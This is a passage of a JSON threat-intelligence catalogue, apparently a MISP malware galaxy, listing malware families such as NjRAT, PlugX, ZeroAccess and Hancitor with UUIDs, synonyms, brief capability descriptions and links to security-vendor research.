"synonyms": [
"Poseidon"
],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/",
"https://blogs.cisco.com/security/talos/poseidon"
]
}
},
{
"uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e",
"value": "WebC2-Yahoo",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60",
"value": "CukieGrab",
"description": "",
"meta": {
"synonyms": [
"Roblox Trade Assist"
],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/malicous-chrome-extensions-stealing-roblox-game-currency-sending-cookies-via-discord/"
]
}
},
{
"uuid": "b1efbadf-26e5-4e35-8fd2-61642c30ecbf",
"value": "Stampedo",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/"
]
}
},
{
"uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90",
"value": "Bredolab",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/",
"https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html"
]
}
},
{
"uuid": "d1298818-6425-49be-9764-9f119d964efd",
"value": "GoogleDrive RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
]
}
},
{
"uuid": "9d58d94f-6885-4a38-b086-b9978ac62c1f",
"value": "ReactorBot",
"description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under",
"http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html",
"http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/",
"http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html"
]
}
},
{
"uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8",
"value": "HTran",
"description": "",
"meta": {
"synonyms": [
"HUC Packet Transmit Tool"
],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/",
"https://www.secureworks.com/research/htran"
]
}
},
{
"uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b",
"value": "NjRAT",
"description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.",
"meta": {
"synonyms": [
"Bladabindi"
],
"type": [],
"refs": [
"http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf",
"http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf",
"http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/",
"https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services"
]
}
},
{
"uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca",
"value": "Tidepool",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf",
"http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/"
]
}
},
{
"uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7",
"value": "ZeroAccess",
"description": "",
"meta": {
"synonyms": [
"Max++",
"Smiscer"
],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html",
"http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/",
"http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/",
"https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/",
"http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html",
"http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/",
"http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/",
"https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/"
]
}
},
{
"uuid": "b37f312f-a0b1-41a9-88ae-da2844c19cae",
"value": "Micropsia",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/",
"http://blog.talosintelligence.com/2017/06/palestine-delphi.html"
]
}
},
{
"uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee",
"value": "PlugX",
"description": "RSA describes PlugX as a RAT (Remote Access Trojan) malware family that has been around since 2008 and is used as a backdoor to fully control the victim's machine. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to:\r\nretrieve machine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nperform keylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file.",
"meta": {
"synonyms": [
"Korplug"
],
"type": [],
"refs": [
"http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html",
"http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
"https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/",
"https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf",
"https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf",
"https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
"https://community.rsa.com/thread/185439",
"https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/",
"https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/",
"https://www.lac.co.jp/lacwatch/people/20171218_001445.html",
"https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/",
"https://securelist.com/time-of-death-connected-medicine/84315/",
"https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf",
"http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html",
"http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html",
"https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf"
]
}
},
{
"uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493",
"value": "ChewBacca",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/"
]
}
},
{
"uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de",
"value": "Contopee",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks"
]
}
},
{
"uuid": "ba557993-f64e-4538-8f13-dafaa3c0db00",
"value": "Asprox",
"description": "",
"meta": {
"synonyms": [
"Aseljo",
"BadSrc"
],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/",
"http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/"
]
}
},
{
"uuid": "8269e779-db23-4c94-aafb-36ee94879417",
"value": "DualToy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/"
]
}
},
{
"uuid": "ec50a75e-81f0-48b3-b1df-215eac646421",
"value": "NewCT",
"description": "",
"meta": {
"synonyms": [
"CT"
],
"type": [],
"refs": [
"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf"
]
}
},
{
"uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84",
"value": "CrossRAT",
"description": "",
"meta": {
"synonyms": [
"Trupto"
],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x28.html",
"https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf"
]
}
},
{
"uuid": "3760920e-4d1a-40d8-9e60-508079499076",
"value": "Neutrino",
"description": "",
"meta": {
"synonyms": [
"Kasidet"
],
"type": [],
"refs": [
"https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/",
"https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/",
"https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet",
"http://securitykitten.github.io/an-evening-with-n3utrino/",
"https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/",
"https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/",
"http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/",
"http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html",
"https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex"
]
}
},
{
"uuid": "2f65f056-6cba-4a5b-9aaf-daf31eb76fc2",
"value": "CryptoRansomeware",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/818369717371027456"
]
}
},
{
"uuid": "cfdb02f2-a767-4abb-b04c-333a02cdd7e2",
"value": "DROPSHOT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
"https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/",
"https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/"
]
}
},
{
"uuid": "12886243-55b6-4864-bf7a-7e2439e3a4c1",
"value": "BYEBY",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan"
]
}
},
{
"uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8",
"value": "PrincessLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/",
"https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/",
"https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/"
]
}
},
{
"uuid": "8a97307f-a029-4c43-88e1-debed2b80b14",
"value": "MAPIget",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "06ffb614-33ca-4b04-bf3b-623e68754184",
"value": "AnubisSpy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf",
"http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/"
]
}
},
{
"uuid": "c0a40d42-33bb-4eca-8121-f636aeec14c6",
"value": "Unidentified 006",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "d9255166-79b3-49af-b676-c07fa9303d7e",
"value": "Winnti",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://401trg.pw/winnti-evolution-going-open-source/",
"https://401trg.pw/an-update-on-winnti/"
]
}
},
{
"uuid": "3acb37f4-5614-4932-b12f-9f1c256895f2",
"value": "JackPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/"
]
}
},
{
"uuid": "ec936d58-6607-4e33-aa97-0e587bbbdda5",
"value": "OmniRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securityintelligence.com/news/omnirat-takes-over-android-devices-through-social-engineering-tricks/",
"https://blog.avast.com/2015/11/05/droidjack-isnt-the-only-spying-software-out-there-avast-discovers-that-omnirat-is-currently-being-used-and-spread-by-criminals-to-gain-full-remote-co"
]
}
},
{
"uuid": "7287a0b0-b943-4007-952f-07b9475ec184",
"value": "Filecoder",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/877811773826641920"
]
}
},
{
"uuid": "4ceebc38-f50b-4817-930f-c954d203ff7b",
"value": "Popcorn Time",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/malwrhunterteam/status/806595092177965058"
]
}
},
{
"uuid": "b51caf06-736e-46fc-9b13-48b0b81df4b7",
"value": "ShellBind",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry"
]
}
},
{
"uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5",
"value": "Serpico",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5",
"value": "Rakos",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/"
]
}
},
{
"uuid": "67457708-1edd-4ef1-9ec0-1c5eb7c75fe2",
"value": "ISMAgent",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.clearskysec.com/ismagent/"
]
}
},
{
"uuid": "9441a589-e23d-402d-9603-5e55e3e33971",
"value": "Chthonic",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan"
]
}
},
{
"uuid": "3198501e-0ff0-43b7-96f0-321b463ab656",
"value": "Casper",
"description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/"
]
}
},
{
"uuid": "4166ab63-24b0-4448-92ea-21c8deef978d",
"value": "Hancitor",
"description": "",
"meta": {
"synonyms": [
"Chanitor"
],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear",
"https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/",
"http://www.morphick.com/resources/lab-blog/closer-look-hancitor",
"https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader",
"https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/",
"https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html",
"https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/",
"https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak",
"https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/"
]
}
},
{
"uuid": "1b62a421-c0db-4425-bcb2-a4925d5d33e0",
"value": "Turla RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "7ac902e0-4a7d-4451-b0fd-cdf98fbe5018",
"value": "PittyTiger RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf",
"https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/"
]
}
},
{
"uuid": "0df52c23-690b-4703-83f7-5befc38ab376",
"value": "Silence",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.intezer.com/silenceofthemoles/",
"https://securelist.com/the-silence/83009/"
]
}
},
{
"uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8",
"value": "w32times",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://attack.mitre.org/wiki/Group/G0022"
]
}
},
{
"uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58",
"value": "Kurton",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41",
"value": "MiniASP",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "de8e204c-fb65-447e-92bd-200e1c39648c",
"value": "Globe",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "74fc6a3a-cc51-4065-bdd9-fcef18c988a0",
"value": "Zeus SSL",
"description": "The sample listed here was previously mislabeled and is now integrated into win.floki_bot. The family is to-be-updated once we have a \"real\" Zeus SSL sample.",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d",
"value": "EvilOSX",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/Marten4n6/EvilOSX",
"https://twitter.com/JohnLaTwC/status/966139336436498432"
]
}
},
{
"uuid": "faa19699-a884-4cd3-a307-36492c8ee77a",
"value": "CryptoNight",
"description": "WebAssembly-based crypto miner.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec",
"https://twitter.com/JohnLaTwC/status/983011262731714565"
]
}
},
{
"uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370",
"value": "GlooxMail",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "619b9665-dac2-47a8-bf7d-942809439c12",
"value": "Harnig",
"description": "",
"meta": {
"synonyms": [
"Piptea"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html",
"https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html"
]
}
},
{
"uuid": "16794655-c0e2-4510-9169-f862df104045",
"value": "Bugat",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "c6467cc3-dafd-482e-881e-ef2e7e244436",
"value": "XBot POS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html"
]
}
},
{
"uuid": "f2a7c867-6380-4cbe-b524-50727a29f0c6",
"value": "ATMii",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/"
]
}
},
{
"uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f",
"value": "jSpy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/"
]
}
},
{
"uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e",
"value": "Salgorea",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf"
]
}
},
{
"uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271",
"value": "Alureon",
"description": "",
"meta": {
"synonyms": [
"TDL",
"Olmarik",
"TDSS",
"Pihar"
],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html",
"http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html",
"http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html"
]
}
},
{
"uuid": "275d65b9-0894-4c9b-a255-83daddb2589c",
"value": "SSHDoor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html"
]
}
},
{
"uuid": "28f35535-dd40-4ee2-8064-5acbe76d8d4c",
"value": "QHost",
"description": "",
"meta": {
"synonyms": [
"Tolouge"
],
"type": [],
"refs": []
}
},
{
"uuid": "ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0",
"value": "Mangzamel",
"description": "",
"meta": {
"synonyms": [
"junidor",
"mengkite",
"vedratve"
],
"type": [],
"refs": [
"https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2"
]
}
},
{
"uuid": "57a6dbce-2d8a-44ae-a561-282d02935698",
"value": "Punkey POS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/",
"https://www.pandasecurity.com/mediacenter/malware/punkeypos/"
]
}
},
{
"uuid": "82733125-da67-44ff-b2ac-b16226088211",
"value": "ONHAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview"
]
}
},
{
"uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada",
"value": "Remexi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
"http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf"
]
}
},
{
"uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f",
"value": "Velso Ransomware",
"description": "Ransomware that appears to require manual installation (believed to be via RDP). Encrypts files with the .velso extension.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/"
]
}
},
{
"uuid": "3f0e7db1-5944-4137-89d1-d36940f596d2",
"value": "Pykspa",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/",
"https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/",
"https://www.youtube.com/watch?v=HfSQlC76_s4"
]
}
},
{
"uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df",
"value": "DistTrack",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html",
"http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/",
"http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware",
"http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412",
"https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis",
"https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon"
]
}
},
{
"uuid": "e6a40fa2-f79f-40e9-89d3-a56984bc51f7",
"value": "PAS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity",
"https://blog.erratasec.com/2016/12/some-notes-on-iocs.html"
]
}
},
{
"uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8",
"value": "BTCWare",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/"
]
}
},
{
"uuid": "0568fcc6-755f-416e-9c5b-22232cd7ae0e",
"value": "AVCrypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/"
]
}
},
{
"uuid": "0fba78fc-47a1-45e1-b5df-71bcabd23b5d",
"value": "Sisfader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/"
]
}
},
{
"uuid": "1cb63b32-cc65-4cdc-945a-e06a88cdd94b",
"value": "Cryptowall",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "5c860744-bb12-4587-a852-ee060fd4dd64",
"value": "Plexor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7",
"https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/"
]
}
},
{
"uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207",
"value": "SeaDaddy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
]
}
},
{
"uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42",
"value": "Zebrocy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/",
"https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/"
]
}
},
{
"uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf",
"value": "Graftor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html"
]
}
},
{
"uuid": "aae3b83d-a116-4ebc-aae0-f6327ef174ea",
"value": "MiKey",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger"
]
}
},
{
"uuid": "309d0745-bbfd-43bc-b2c4-511592a475bf",
"value": "DarkHotel",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/",
"https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/",
"http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html",
"https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/"
]
}
},
{
"uuid": "503ca41c-7788-477c-869b-ac530f20c490",
"value": "SendSafe",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "c513c490-7c76-42ab-a51f-cc780faa7146",
"value": "Multigrain POS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/",
"https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html"
]
}
},
{
"uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a",
"value": "rdasrv",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf"
]
}
},
{
"uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4",
"value": "Rurktar",
"description": "",
"meta": {
"synonyms": [
"RCSU"
],
"type": [],
"refs": [
"https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction"
]
}
},
{
"uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f",
"value": "Unidentified 048 (Lazarus?)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/DrunkBinary/status/1002587521073721346"
]
}
},
{
"uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5",
"value": "Nitol",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
